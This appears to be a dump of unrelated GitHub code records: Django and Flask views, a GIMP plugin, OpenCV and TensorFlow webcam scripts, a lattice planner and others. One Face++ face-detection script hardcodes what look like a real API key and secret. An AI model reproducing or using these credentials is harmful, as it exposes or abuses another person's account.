alert(screen, \"LOADING\")\n\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n\n CONFIG[\"rowlimit\"] = screen.height - 2\n if (\n data[CURRENT[\"category\"]] is not None\n and len(data[CURRENT[\"category\"]][\"entries\"]) < CONFIG[\"rowlimit\"]\n ):\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n CURRENT[\"id\"] = data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n ].get(\"id\", \"\")\n\n if keycode in KEYLIST[\"arrow\"]:\n draw_entries(clearline=True)\n screen.refresh()\n\n \"\"\" \n # for keycode debug\n screen.print_at('%s ' % keycode, screen.width - 15, screen.height - 2, colour=0, bg=15)\n screen.refresh()\n #\"\"\"\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n o_current_time = current_time\n current_time = int(\n time.time()\n * CONFIG[\n \"marqueeSpeed\"\n if CURRENT.get(\"direction\", \"left\") == \"left\"\n else \"marqueeSpeedReturn\"\n ]\n )\n\n if o_current_time != current_time:\n do_timer()\n\n if screen.has_resized():\n return False\n\n\ndef do():\n def signal_handler(sig, frame):\n sys.exit(\"Bye\")\n\n if not os.path.isfile(FEEDS_FILE_NAME):\n sys.stdout.write(\"Initalizing RSS feeds...\\n\")\n dummy = get_feeds_from_rss(log=True)\n\n with open(FEEDS_FILE_NAME, \"r\") as fp:\n RSS = json.load(fp)\n\n CONFIG[\"categories\"] = ((\"twitter\", \"Twitter\"),) + tuple(\n [(key, d[\"title\"]) for key, d in RSS.items()]\n )\n\n sys.stdout.write(\"Loading Twitter feeds...\\n\")\n\n dummy = get_data(\"twitter\")\n\n signal.signal(signal.SIGINT, signal_handler)\n\n while True:\n if Screen.wrapper(layout):\n break\n\n sys.stdout.write(\"Bye\\n\")\n\n\nif __name__ == \"__main__\":\n do()\n","repo_name":"rainygirl/rterm","sub_path":"rterm_src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"37617646868","text":"#\n# from django.shortcuts import get_object_or_404, redirect\n# from django.urls import reverse, reverse_lazy\n# from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView, TemplateView\n#\n# from webapp.forms import PollForm, ChoiceForm\n# from webapp.models import Poll, Choice, Answer\n#\n#\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\n\nfrom webapp.forms import ProductForm, ReviewForm\nfrom webapp.models import Product, Review\n\n\nclass ProductsView(ListView):\n model = Product\n template_name = 'for_product/index.html'\n context_object_name = 'products'\n paginate_by = 5\n\n\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(object_list=None, **kwargs)\n products=[]\n object_list=Product.objects.all()\n for product in object_list:\n total = 0\n review = product.review.filter(mod=1)\n for i in review:\n total+=i.score\n avg = total/len(review)\n product.avg = avg\n products.append(product)\n context['products']=products\n return context\n\n#\nclass ProductDetaillView(DetailView):\n model = Product\n template_name = 'for_product/view.html'\n context_object_name = 'product'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(object_list=None, **kwargs)\n total = 0\n pk = self.kwargs.get('pk')\n product = get_object_or_404(Product, pk=pk)\n review = product.review.filter(mod=1)\n for i in review:\n total+=i.score\n avg = total/len(review)\n context['avg']=avg\n return context\n\n\n\n\nclass ProductCreate(PermissionRequiredMixin,CreateView):\n template_name = 'for_product/create.html'\n model = Product\n form_class = ProductForm\n permission_required = 'webapp.add_product'\n\n def get_success_url(self):\n return reverse('webapp:ProductDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ProductUpdate(PermissionRequiredMixin,UpdateView):\n template_name = 'for_product/update.html'\n model = Product\n form_class = ProductForm\n permission_required = 'webapp.change_product'\n\n\n\n def get_success_url(self):\n return reverse('webapp:ProductDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ProductDelete(PermissionRequiredMixin,DeleteView):\n model = Product\n context_object_name = 'product'\n template_name = 'for_product/delete.html'\n success_url = reverse_lazy('webapp:ProductsView')\n permission_required = 'webapp.delete_product'\n#\n\n\nclass ReviewView(ListView):\n model = Review\n template_name = 'for_review/view.html'\n context_object_name = 'review'\n\n\n\n\n\nclass ReviewDetaillView(DetailView):\n model = Review\n template_name = 'for_review/detailview.html'\n context_object_name = 'review'\n\n\n\n\n\nclass ReviewCreate(CreateView):\n template_name = 'for_review/create.html'\n form_class = ReviewForm\n\n\n def form_valid(self, form):\n author = self.request.user\n form.instance.author = author\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('webapp:ReviewDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ReviewUpdate(PermissionRequiredMixin, UpdateView):\n template_name = 'for_review/update.html'\n model = Review\n form_class = ReviewForm\n permission_required = 'webapp.change_review'\n\n def has_permission(self):\n return super().has_permission() and self.request.user == self.get_object().review.author\n\n def form_valid(self, form):\n if self.request.user.is_superuser:\n self.object = form.save()\n else:\n self.object = form.save()\n self.object.mod = False\n self.object.save()\n return super().form_valid(form)\n\n\n\n\n def get_success_url(self):\n return reverse('webapp:ReviewDetaillView', kwargs={'pk': self.object.pk})\n#\nclass DeleteReview(PermissionRequiredMixin, DeleteView):\n model = Review\n context_object_name = 'review'\n template_name = 'for_review/delete.html'\n success_url = reverse_lazy('webapp:ReviewView')\n permission_required = 'webapp.delete_review'\n\n def has_permission(self):\n return super().has_permission() and self.request.user in self.get_object().review.author.all()\n#\n#\n\n#\n#\n#\n#\n#\n#\n#\n","repo_name":"KimLeoVal/7","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28412332307","text":"# -*- coding: utf-8 -*-\nimport os\nfrom mako.lookup import TemplateLookup\n\nsettings = {\n 'debug': True\n}\n\nBASEPATH = os.path.join(os.path.dirname(__file__), \"..\")\n\nSTATIC_HOME = os.path.join(BASEPATH, 'static')\n\nTLOOPUP = TemplateLookup(\n directories=[os.path.join(BASEPATH, 'template')],\n output_encoding='utf-8',\n input_encoding='utf-8',\n default_filters=['decode.utf8'],\n encoding_errors='replace'\n)\n\nif __name__ == '__main__':\n print(STATIC_HOME)","repo_name":"1013553207/WAF","sub_path":"src/managerWeb/config/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"74981471800","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport serial as serial\nimport time\n\n#define find laser spot function\ndef find_laser(threshold_a, threshold_b, img, dim):\n #holds all coords suspected to be part of the laser\n spot = []\n \n #loops through image\n for y in range(dim[0]):\n for x in range(dim[1]):\n temp = img[y,x]\n a = temp[1]\n b = temp[2]\n #if pixel is bright enough its coordinates are added to the spot list\n if (a > threshold_a and b > threshold_b):\n coord = [y,x]\n spot.append(coord)\n \n return spot\n\n#calculates average of all coordinates in the spot so that the center can be sent to the arduino\ndef find_center(spot):\n center = [0,0]\n sum_x = 0\n sum_y = 0\n for cordinate in spot:\n sum_x += cordinate[1]\n sum_y += cordinate[0]\n length = len(spot)\n center[0] = sum_y/length\n center[1] = sum_x/length\n \n return center\n \n#establish serial connection\n# ser = serial.Serial('COM3')\n \n#start infinite while loop\nwhile(1):\n # ready = False\n \n # while not ready:\n # with open('filename.txt') as f:\n # for line in f:\n # pass\n # last_line = line\n # if last_line == \"ready to find dot\":\n # ready = True\n \n #if we get this far we know we can load the laser image\n #load in image\n IMG_PATH = r\"C:/Users/jrkin/laser5.jpg\" #need to change this path for actual use\n original = cv.imread(IMG_PATH)\n #hsv = cv.cvtColor(original, cv.COLOR_BGR2HSV)\n dim = original.shape\n \n plt.imshow(original)\n plt.show()\n thresh_a = 250\n thresh_b = 200\n \n spot = []\n #runs find_laser\n iteration = 1\n while (1):\n print(\"running find laser iteration: \", iteration)\n iteration += 1\n spot = find_laser(thresh_a, thresh_b, original, dim)\n #if list of spot coordinates is small enough loop is broke\n if (len(spot) < 100):\n break\n else:\n #if list is too long, threshold values are increased to \n #try and isolate the laser spots\n if (thresh_a < 255):\n thresh_a += 1\n if (thresh_b < 255):\n thresh_b += 5\n \n #finds center of the laser\n center = find_center(spot)\n print(center)\n \n #shows image\n \n plt.imshow(original)\n plt.show()\n break","repo_name":"jrkinneer/jr_design_final","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15693743308","text":"#!/usr/bin/env python\n\nfrom gimpfu import *\n\n\n\ndef vector_to_line_stroke(image, vector, layer, color=\"#000000\", width=1, capstyle=\"butt\", joinstyle=\"miter\", miterlimit=10):\n import re, tempfile\n newelements = {\n 'stroke': color,\n 'stroke-width': width,\n 'stroke-linecap': capstyle,\n 'stroke-linejoin': joinstyle,\n 'stroke-miterlimit': miterlimit,\n }\n svg = pdb.gimp_vectors_export_to_string(image, vector)\n #fix width and height to be resolution (px/inch)-independent\n svg = re.sub(r'(]*\\swidth\\s*=\\s*)\\S*\"', r'\\1\"%dpx\"' % image.width, svg, flags=re.DOTALL)\n svg = re.sub(r'(]*\\sheight\\s*=\\s*)\\S*\"', r'\\1\"%dpx\"' % image.height, svg, flags=re.DOTALL)\n svg = re.sub(r'(]*)\\sstroke\\s*=\\s*\"black\"', r'\\1', svg, flags=re.DOTALL)\n svg = re.sub(r'(]*)\\sstroke-width\\s*=\\s*\"1\"', r'\\1', svg, flags=re.DOTALL)\n svg = re.sub(r'(/MyScripts/Vector To line Stroke\", \n \"RGB*\", #no idea whether it will work on other items\n [\n (PF_IMAGE, 'image', 'Image', None),\n (PF_VECTORS, 'vector', 'Vector (path)', None),\n (PF_DRAWABLE, 'layer', 'The target layer for the stroke', None),\n (PF_STRING, 'color', 'Color as string in some way that is SVG comaptible (e.g. \"black\", or \"#FF0000\")', \"#000000\"),\n (PF_INT, 'width', 'Line width', 1),\n (PF_STRING, 'capstyle', 'Some valid SVG cap style (i.e. \"butt\", \"square\", or \"round\")', \"butt\"),\n (PF_STRING, 'joinstyle', 'Some valid SVG join style (i.e. \"miter\", \"round\" or \"bevel\")', \"miter\"),\n (PF_INT, 'miterlimit', '''The miterlimit (google thisif you don't understand it)''', 10)\n ], \n [\n ],\n vector_to_line_stroke,\n )\n\nmain()\n\n#usage: Create an image, with at least one vector (one path), and then run:\n#pdb.python_fu_vector_to_line_stroke(gimp.image_list()[0], gimp.image_list()[0].vectors[0], gimp.image_list()[0].layers[0], \"#000000\", 10, \"butt\", \"miter\", 10)\n","repo_name":"reinhrst/nl.claude.tools","sub_path":"gimp-fu/vector-to-line-stroke.py","file_name":"vector-to-line-stroke.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32785809693","text":"from lattice_planner.lattice_graph import LatticeGraph, ObstaclesGrid\nfrom lattice_planner import drawing_utils\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n graph = LatticeGraph()\n n_rows = 10\n n_cols = 10\n lattice_cell_size = 10\n lattice_type = 'arc_grid' # square_grid, arc_grid\n\n graph.configure(n_rows=n_rows, n_cols=n_cols, lattice_cell_size=lattice_cell_size, lattice_type=lattice_type)\n\n # square grid , dim=2: (row, col)\n if lattice_type == 'square_grid':\n s = (1, 1)\n g = (9, 9)\n\n # arc grid , dim=3: (row, col, angle) [angle = 0 is horizontal to the right, ccw]\n if lattice_type == 'arc_grid':\n s = (1, 1, 270)\n g = (4, 8, 90)\n\n obs = ObstaclesGrid(map_size=(n_rows*lattice_cell_size, n_cols*lattice_cell_size))\n\n obs.map[25:35, 45:56] = True\n obs.map[67:89, 57:76] = True\n obs.map[50:55, 80:89] = True\n obs.map[20:60, 25:35] = True\n\n graph.update_obstacles(obs)\n\n fig = drawing_utils.plot_scene(obs, graph, lattice_cell_size)\n drawing_utils.plot_graph(fig, graph, obs, lattice_cell_size)\n\n path = graph.solve(s, g, 'A*') # bfs, dijkstra, A*\n\n print(\"path length = \", len(path))\n\n drawing_utils.plot_solution(fig, s, g, path, graph, lattice_cell_size)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"izzys/LatticePlanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9883625907","text":"from fastapi import APIRouter, Depends, UploadFile, File\nfrom sqlalchemy.orm import Session\nfrom .dependencies import get_db_session, get_current_user\n\n\nfrom schemas.copropietario import Copropietario as Copro\nfrom schemas.copropietario import UpdateCopropietario, CopropietarioBase\nfrom data.models.copropietario import Copropietario\nfrom services.copropietario import CopropietarioService\n\n\ncopropietario_router = APIRouter(prefix='/conpropietario')\n\n@copropietario_router.get(\"/\", response_model=list[UpdateCopropietario], tags=[\"Copropietario\"])\ndef ger_copropietarios(session: Session=Depends(get_db_session)):\n service = CopropietarioService(session)\n\n return service.get_copropietarios()\n\n@copropietario_router.post(\"/\", response_model=Copro, tags=[\"Copropietario\"])\ndef register_user(user: Copro = Depends(), foto: UploadFile = File(default=None), \n session: Session=Depends(get_db_session)):\n copropietario_service = CopropietarioService(session)\n if foto:\n foto = foto.file.read()\n\n return copropietario_service.register_copropietario(foto, user)\n\n@copropietario_router.put(\"/{id}\", response_model=Copro, tags=[\"Copropietario\"])\ndef update_copropietario(id_copropietario, foto:UploadFile=File(default=None), user: UpdateCopropietario= Depends(),\n session: Session=Depends(get_db_session)):\n copropietario_service = CopropietarioService(session)\n if foto:\n foto = foto.file.read()\n\n return copropietario_service.update_copropietario(id_copropietario, foto, user)\n\n","repo_name":"mauropascual/SisInfo","sub_path":"AppApi/api/copropietario.py","file_name":"copropietario.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9913433650","text":"\"\"\"Saijil Nemchund\r\nNMCSAI001\r\nProgram that creates the 2048 game\"\"\"\r\n\r\ndef basic(a): \r\n for j in range(4):\r\n if type(a[j])==str: #making the spaces in the grid equal to zero \r\n a[j]=0 \r\n \r\n for i in range(1,4): \r\n m=i\r\n while a[m-1]==0 and m>0: #when a number moves from a position it makes that original position zero \r\n a[m-1]=a[m]\r\n a[m]=0 \r\n m=m-1\r\n \r\n for i in range(3):\r\n if a[i]==a[i+1]:\r\n a[i]=2*a[i]\r\n a[i+1]=0\r\n \r\n for i in range(1,4):\r\n m=i\r\n while a[m-1]==0 and m>0:\r\n a[m-1]=a[m]\r\n a[m]=0\r\n m=m-1 \r\n\r\n\r\n \r\ndef push_right(grid): #when the user slides to the right in the game\r\n for m in range(4):\r\n a=[grid[m][3],grid[m][2],grid[m][1],grid[m][0]]\r\n basic(a)\r\n a.reverse()\r\n for i in range(4):\r\n grid[m][i]=a[i]\r\n\r\ndef push_left(grid): #when the user slides to the left in the game\r\n for m in range(4):\r\n a=[grid[m][0],grid[m][1],grid[m][2],grid[m][3]]\r\n basic(a)\r\n \r\n for i in range(4):\r\n grid[m][i]=a[i] \r\n \r\ndef push_up(grid): # when the user slides up in the game\r\n for m in range(4):\r\n a=[grid[0][m],grid[1][m],grid[2][m],grid[3][m]]\r\n basic(a)\r\n for i in range(4):\r\n grid[i][m]=a[i]\r\n \r\ndef push_down(grid): #when the user slides down in the game\r\n for m in range(4):\r\n a=[grid[3][m],grid[2][m],grid[1][m],grid[0][m]]\r\n basic(a)\r\n a.reverse()\r\n for i in range(4):\r\n grid[i][m]=a[i] ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/nmcsai001/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74704599481","text":"# import the opencv library\r\nimport cv2\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n# define a video capture object\r\ncamera = cv2.VideoCapture(0)\r\n\r\nmodel = tf.keras.models.load_model(\"Projects/Project-110/rock-paper-scissor_keras_model.h5\")\r\n\r\n\r\nwhile(True):\r\n \r\n # Capture the video frame by frame\r\n status, frame = camera.read()\r\n frame = cv2.flip(frame,1)\r\n img = cv2.resize(frame,(224,224))\r\n testimg = np.array(img,dtype = np.float32)\r\n testimg = np.expand_dims(testimg,axis = 0)\r\n normalizeimg = testimg / 255\r\n \r\n prediction = model.predict(normalizeimg)\r\n print(\"Prediction: \",prediction)\r\n \r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n \r\n # Quit window with spacebar\r\n key = cv2.waitKey(1)\r\n \r\n if key == 32:\r\n break\r\n \r\n# After the loop release the cap object\r\ncamera.release()\r\n\r\n# Destroy all the windows\r\ncv2.destroyAllWindows()","repo_name":"SuvithSajeev/Project-110","sub_path":"PRO-C110-Project-Boilerplate.py","file_name":"PRO-C110-Project-Boilerplate.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7135976517","text":"# -*- coding: utf-8 -*-\nimport urllib.request\nimport urllib.error\nimport time\nimport json\nimport cv2\nimport time\n\ncap = cv2.VideoCapture(0)\ncap.set(0,640) # set Width (the first parameter is property_id)\ncap.set(1,480) # set Height\ntime.sleep(2)\n\n\nfor i in range(10):# 拍100张图片就结束\n ret, img = cap.read()\n cv2.imshow('img', img)\n cv2.imwrite('image/%d.jpg' %(i), img)\n \n\t# Press 'ESC' for exiting video\n k = cv2.waitKey(100) & 0xff \n if k == 27:\n break\n \ncap.release()\ncv2.destroyAllWindows()\n\nhttp_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'\nkey = \"VfFq28mDLp1hLWXKGXVfNGO8LUKvpTBs\"\nsecret = \"m1GTqEqGungSNT-J6YIn4MobFsAEOpkL\"\nfilepath = r\"/home/sara/Desktop/test/image/9.jpg\"\n\nboundary = '----------%s' % hex(int(time.time() * 1000))\ndata = []\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_key')\ndata.append(key)\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_secret')\ndata.append(secret)\ndata.append('--%s' % boundary)\nfr = open(filepath, 'rb')\ndata.append('Content-Disposition: form-data; name=\"%s\"; filename=\" \"' % 'image_file')\ndata.append('Content-Type: %s\\r\\n' % 'application/octet-stream')\ndata.append(fr.read())\nfr.close()\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_landmark')\ndata.append('1')\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_attributes')\ndata.append(\n \"gender,age,smiling,headpose,facequality,blur,eyestatus,emotion,ethnicity,beauty,mouthstatus,eyegaze,skinstatus\")\ndata.append('--%s--\\r\\n' % boundary)\n\nfor i, d in enumerate(data):\n if isinstance(d, str):\n data[i] = d.encode('utf-8')\n\nhttp_body = b'\\r\\n'.join(data)\n\n# build http request\nreq = urllib.request.Request(url=http_url, data=http_body)\n\n# header\nreq.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)\n\ntry:\n # post data to server\n resp = urllib.request.urlopen(req, timeout=5)\n # get response\n qrcont = resp.read()\n # if you want to load as json, you should decode first,\n rsp = json.loads(qrcont.decode('utf-8'))\n # print(qrcont.decode('utf-8'))\n # print(rsp)\n # print(type(rsp))\n print(rsp['faces'][0]['attributes']['glass']['value'])\n if rsp['faces'][0]['attributes']['glass']['value']=='Normal':\n print(\"please take off your glasses\")\n elif rsp['faces'][0]['attributes']['glass']['value']=='Dark':\n print(\"please take off your dark glasses\")\nexcept urllib.error.HTTPError as e:\n print(e.read().decode('utf-8'))\n","repo_name":"sara0818/summerTerm","sub_path":"cv/sourcecode/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31965168702","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/python3\n\nimport numpy as np\nimport pandas as pd\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Patch\n\nfrom matplotlib import cm\nfrom matplotlib import colors as mcolors\n\n# LOLH objects\n\nimport sys\nsys.path.append('../../python')\n\nfrom instance import Instance\nfrom solver import Solver\n\nimport visualizer\nimport histogram\n\n#-------------------------------------------------------------------------------\ndef compute_polygons(instance, nondominated_atoms):\n\n # pre: ordered non dominated atoms (indexes)\n\n points_inside = []\n points_outside = []\n\n index = 0\n for atom_index in nondominated_atoms:\n score = instance.atom_score[atom_index]\n\n if index == 0:\n bottom = 0\n else:\n bottom = instance.atom_score[nondominated_atoms[index-1]][1]\n\n if index == len(nondominated_atoms)-1:\n right = instance.n_positives()\n else:\n right = instance.atom_score[nondominated_atoms[index+1]][0]\n\n points_inside.append((score[0], bottom))\n points_inside.append(score)\n points_inside.append((right, score[1]))\n\n points_outside.append((score[0], bottom))\n points_outside.append(score)\n points_outside.append((right, score[1]))\n\n index += 1\n\n points_inside.append((instance.n_positives(), 0))\n points_inside.append((0,0))\n\n points_outside.append((instance.n_positives(), instance.n_negatives()))\n points_outside.append((0, instance.n_negatives()))\n\n return points_inside, points_outside\n\n\n\n#-------------------------------------------------------------------------------\ndef plot_nondominated_atoms(ax, instance):\n\n # compute the non dominated atoms\n solver = Solver(instance)\n nondominated_atoms = solver.compute_nondominated_atoms(list(range(instance.n_atoms())))\n print('non dominated atoms: ', nondominated_atoms)\n\n other_atoms_indexes = [atom_index for atom_index in range(instance.n_atoms()) if not atom_index in nondominated_atoms]\n\n # ax.scatter([instance.atom_score[atom_index][0] for atom_index in LOLH_rule], [instance.atom_score[atom_index][1] for atom_index in LOLH_rule], marker='o', color='red', s=4, label='atomes sélectionnés', zorder=2)\n\n ax.scatter([instance.atom_score[atom_index][0] for atom_index in nondominated_atoms], [instance.atom_score[atom_index][1] for atom_index in nondominated_atoms], marker='x', color='red', label='atomes non dominés', zorder=2)\n\n ax.scatter([instance.atom_score[atom_index][0] for atom_index in other_atoms_indexes], [instance.atom_score[atom_index][1] for atom_index in other_atoms_indexes], marker='x', zorder=1, label='atomes dominés', alpha=0.7)\n\n points_inside, points_outside = compute_polygons(instance, nondominated_atoms)\n\n # display the dominance cones\n index = 0\n for atom_index in nondominated_atoms:\n score = instance.atom_score[atom_index]\n if index == 0:\n bottom = 0\n else:\n bottom = instance.atom_score[nondominated_atoms[index-1]][1]\n if index == len(nondominated_atoms)-1:\n right = instance.n_positives()\n else:\n right = instance.atom_score[nondominated_atoms[index+1]][0]\n\n # bottom\n ax.plot([score[0], score[0]], [score[1], bottom], '--', zorder=1, color='black')\n\n # right\n ax.plot([score[0], right], [score[1], score[1]], '--', zorder=1, color='black')\n\n # label\n # ax.text(score[0], score[1], str(ind))\n index += 1\n\n # equation score = 0\n # ax.plot([0, instance.n_positives()], [0, instance.n_negatives()], color='black', label='score=0.0', zorder=3)\n\n ax.set_xlim([0, instance.n_positives()])\n ax.set_ylim([0, instance.n_negatives()])\n\n ax.set_xlabel('erreur positive')\n ax.set_ylabel('erreur négative')\n # ax.set_title('Atom errors for the classification of ' + str(cell_type))\n\n ax.set_aspect(instance.n_positives()/instance.n_negatives())\n\n ax.fill([point[0] for point in points_outside], [point[1] for point in points_outside], alpha=0.3, zorder=0, color='red')\n ax.fill([point[0] for point in points_inside], [point[1] for point in points_inside], alpha=0.3, zorder=0, color='green')\n\n ax.legend(loc='lower right')\n\n return\n\n# import the cell types\nfile_name = '../../dataset/Imagine/cell_types.csv'\ndf_cell_types = pd.read_csv(file_name, index_col=0)\ndf_cell_types.rename(columns={'cellType_final': 'Label'}, inplace=True)\n\n# import the UMAP 2d representation\nfile_name = '../../dataset/Imagine/umap_coordinates.csv'\numap_coordinates = pd.read_csv(file_name, index_col = 0)\n\n# import the single cell discretized matrix\nfile_name = '../../dataset/Imagine/discrete_matrix.csv'\ndf = pd.read_csv(file_name, index_col=0)\n\n\n# Measure of the quality for the CD8 instance\n\n# creation of the classification instance for CD8\ninstance_CD8 = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'CD8')\nfig, ax = plt.subplots()\nplot_nondominated_atoms(ax, instance_CD8)\nsolver_CD8 = Solver(instance_CD8)\nprint('relative area for CD8: ', solver_CD8.compute_relative_atom_area(solver_CD8.compute_nondominated_atoms(list(range(instance_CD8.n_atoms())))))\n\n# Measure of the quality for the NK and CD4 instance\ninstance_NK = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'NK')\ninstance_CD4 = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'CD4')\n\nsolver_NK = Solver(instance_NK)\nsolver_CD4 = Solver(instance_CD4)\nprint('relative area for NK: ', solver_NK.compute_relative_atom_area(solver_NK.compute_nondominated_atoms(list(range(instance_NK.n_atoms())))))\nprint('relative area for CD4: ', solver_CD4.compute_relative_atom_area(solver_CD4.compute_nondominated_atoms(list(range(instance_CD4.n_atoms())))))\n\nfig, axs = plt.subplots(1, 2)\nplot_nondominated_atoms(axs[0], instance_NK)\nplot_nondominated_atoms(axs[1], instance_CD4)\naxs[0].set_title('Instance NK')\naxs[1].set_title('Instance CD4')\n\nplt.show()\n","repo_name":"smbct/LOLH","sub_path":"examples/Imagine/classification_quality.py","file_name":"classification_quality.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7580953542","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\npath2readme = path.abspath(path.dirname(__file__))\nwith open(path.join(path2readme, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='uplift',\n version='0.3.1',\n description='Code for Uplift Modeling.',\n long_description=long_description,\n url='https://github.com/i-yamane/uplift',\n author='Ikko Yamane',\n author_email='yamane@ms.k.u-tokyo.ac.jp',\n python_requires='>=3',\n packages=find_packages(exclude=[])\n)\n","repo_name":"i-yamane/uplift","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"7570621188","text":"import matplotlib.pyplot as plt\r\n\r\nlabels = ['comp', 'mgt','comm', 'acs', 'vcd']\r\n\r\nmen_means = [20,35,30,35,27]\r\nwomen_means = [25,32,34,20,25]\r\n\r\nmen_std = [2, 3, 4, 1, 2]\r\nwomen_std = [3,5,2,3,3]\r\n\r\nwidth = 0.35\r\n\r\nfig, ax = plt.subplots()\r\n\r\nax.bar(labels, men_means, width, yerr=men_std, label='Men')\r\nax.bar(labels, women_means, width, yerr=women_std, bottom=men_means, label='women')\r\n\r\nax.set_ylabel('scores')\r\n\r\nax.set_title('scores by major and gender')\r\n\r\nax.legend()\r\n\r\nplt.show()","repo_name":"faaq02/portofolio","sub_path":"Python/Sample/Table.py","file_name":"Table.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71227507322","text":"from tests import *\nfrom tests.helpers import *\nfrom contracts.nft_as_collateral import *\n\n@pytest.fixture(scope=\"function\")\ndef nft_as_collateral_app_id(algod_client: AlgodClient):\n user = generate_funded_account(algod_client)\n client = ApplicationClient(algod_client, nft_as_collateral_app, signer=user.signer, sender=user.address)\n app_id, app_addr, _ = client.create()\n algo_faucet(algod_client, app_addr)\n return app_id\n\n","repo_name":"palace22/algorand-school-mega-ace-task","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23056319098","text":"from app import app\nfrom app import db\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nfrom app.static.models import Author\nfrom app.static.models import Book\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.method == 'POST':\n # Gather a new data\n author = request.form['author']\n book = request.form['title']\n # Process the data\n new_author = Author(name=author)\n new_book = Book(title=book, author_id=new_author.id)\n new_author.books.append(new_book)\n try:\n db.session.add(new_author)\n db.session.add(new_book)\n db.session.commit()\n return redirect('/')\n except Exception as e:\n return e\n else:\n authors = Author.query.order_by(Author.id).all()\n return render_template('index.html', authors=authors)\n\n\n@app.route('/authors')\ndef authors():\n authors = Author.query.order_by(Author.id).all()\n return render_template('authors.html', authors=authors)\n\n\n@app.route('/books')\ndef books():\n books = Book.query.order_by(Book.id).all()\n return render_template('books.html', books=books)\n","repo_name":"gherud/crud-app","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74785403640","text":"#!/usr/local/bin/python\n\nimport sys\n\nusage = \"\"\" Find square root of a give number\n\n Usage: findSquareRoot.py \n Example: findSquareRoot.py 16\"\"\"\n\ndef main(argv):\n 